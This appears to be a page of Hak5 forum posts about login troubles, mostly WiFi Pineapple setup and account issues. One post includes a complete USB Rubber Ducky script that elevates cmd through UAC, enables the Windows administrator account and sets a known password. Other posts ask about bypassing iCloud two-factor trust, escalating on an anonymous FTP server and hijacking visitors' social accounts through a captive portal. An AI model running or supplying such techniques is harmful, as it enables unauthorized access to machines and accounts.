Search the Community

Hello everyone. So, I have a primary account with all my Hak5 orders and all my posts, but instead, I made a new account (which miraculously logs in every time, no problem). But, I wonder if it's because of my "sales@shadowgaming.network" email instead of my primary business email, I use "sales@spragginsdesigns.com" Maybe this forum has a backend server difficulty, or even frontend on the HTML page like this, requiring .com only, yet you can register with a .network and login, so it cannot be this: <input type="email" id="email" pattern=".+@globex\.com" size="30" required> Either way, I always have to reset my password after a couple of logins, and now I never even get the "reset my password" links. So I have to contact support again, but maybe someone on here knows a solution or possibly works here that could help me? I know the password is correct. I use Dashlane, make them long and complicated, but I always start my passwords with the site. So, for example, my password could be !t!zH#dbh8!si7L@, or it could be Hak5!t!zH#dbh8!si7L@ I chose the latter because then, if I come into a rare instance like this, I know for dang sure I have the correct password and email. Especially with this site, I have had to make secure notes every time I reset my password, but as I stated earlier, I cannot even do that anymore.

I want to connect the wifi without password but when I set Management AP Key null，it tells me that “Error: WPA2 Passwords must be at least 8 characters long.” anyone can help me ？

Hi, Doing some security testing/learning in my home lab again, this time using an iOS phone. Does anyone know how the Two-Factor-Authentication for iOS devices determines whether the device logging in is indeed a 'Trusted Device'? Does it use the MAC address of the device, the IP address, a file on the device? I'm using a Kali box to see if I can log in to the iCloud without it asking for Two-Factor-Authentication; tricking the login in to thinking that the Kali box is actually the trusted iOS phone. In order to do so, I need to narrow down how the iOS login determines that the device is trusted. So far, I've found; I assume this means that a file must be saved on the device somewhere? Thank you.

We have literally gone through every piece of information on this site and we are still unable to login to our pineapple after collecting data for 3 days. How can I exchange this defective pineapple for one that works. This was its first use!

Hi all, I'm a newbie to the pineapple and the community - from what I've heard and read it's an awesome device! I've had a look around the forums and couldn't quite find the right answer, unless I totally missed a thread. So I took delivery of the Mark 5 a couple of days ago and went through the instructions in the manual for connection setup in Windows. The first issue was that once I had set the password it stayed on the screen where it says "password successfully set" and didn't seem to restart and bring up the continue button to click and then log on. After a few tries of this I switched off and rebooted. I'm at the stage now where I can navigate to 172.16.42.1:1471 and get the page with username and password - username is down as "root" (I'm assuming that once one logs in it'll allow you to create another account) but when I enter my password it doesnt accept it - I just get the "incorrect username/password" message. The lights on the device at this stage are steady green, blue and amber and all dip switches are in the up position - that's how they out of the box. I hope someone can help or point me in the right direction. Thank you, Z

Hello everyone, I am new to the USB Rubber Ducky and today I made my first script. It is pretty simle, but it works. This script will open a powershell with administratior privleges after bypassing UAC, then it will activate the build-in administrator account and change the password to Password1. If anyone has any changes that would make this better, please share. REM Author securityoverride, with code based off of Hak5Darren REM Creation Date 5-26-15 REM This script will activate the default admin account and change the password REM ***Bypass UAC*** DELAY 2000 WINDOWS r DELAY 500 STRING powershell Start-process cmd.exe -Verb runAs ENTER DELAY 1000 ALT y DELAY 500 REM ***Activate the default admin account*** STRING net user administrator /active:yes ENTER DELAY 500 REM ***Change the default admin password to "Password1"*** STRING net user administrator Password1 ENTER DELAY 500 REM ***GTFO*** STRING exit ENTER

Hello all, I am borrowing a WiFi Pineapple Mark V from my professor to do a small hacking project. I assume someone else used this device before me, because when I started going through the steps for a first-time setup in the manual, I found that instead of seeing this start screen: ...I saw a different screen asking me to put in a username (default "root") and password. Instead of doing what probably would have been the easier option and asking my professor what the password was, I decided to reset the pineapple and start from the top. At first, things seemed to be going as expected. The red, orange, and blue LEDs blinked on cue, I connected to the pineapple through a spare TP-LINK device I had laying around, and I was able to ping and later connect to 172.16.41.1:1471 after setting my main wireless connection to "share" with the TP-LINK and changing the TP-LINK's default IP to 172.16.42.42 (I can ping that address too). However, once I got to this screen: ...things stopped working as expected. I have tried several times with three different web browsers to set a password on this screen, and every time it loads a white screen with the message "The CGI process did not produce any response" on it. I have tried powering off and rebooting the device, and reset it a second time to make sure. Can someone tell me where I've gone wrong?

Dear hak5 community thanks for the wonderful tool and the help given until now now i am on a project that maybe someone did already and can give me some tips or point me to some tutorial i want to give free wifi access to users i set up the mkv with a yagi antenna i want to create a portal for login that 1) displays adsense and banners 2) requires login with facebook or twitter credentials, and once logged in will post or retweet something for number one doesnt seem too big of a issue, but i dont know where to start for number too i am looking for a facebook and tweeter app developer that will create an app that will post and tweet i do not need to get the credentials they are login in with, but i need to get something in return for the free internet i offer also, is there a way to limit the bandwidth that is given to the AP? thanks in advance

so i found ftp server which have anonymous login and it have a banner that says 220 Microsoft FTP Service User (xxxxxxxxxxxxxx.xxx:(none)): and the anonymous LOGIN user is ftp but if you try to update anything its says ftp> mkdir bd 550 bd: Access is denied. ftp> so is there any thing that can edit or enables and give su to ftp server.

this may not come as news to most ppl on this forum but the Windows XP (and reportedly Win7) login password is easy to hack using a plain old boot disc. According to researchers the Offline NT Password & Registry Editor utility can be used to reset the password and Ophcrack can crack the pswd hash using large rainbow tables. Although I personally haven't seen similar utilities for Linux, I bet there's a slew of'em out there. Anyone know of any boot disc type tools for lost Linux pswds?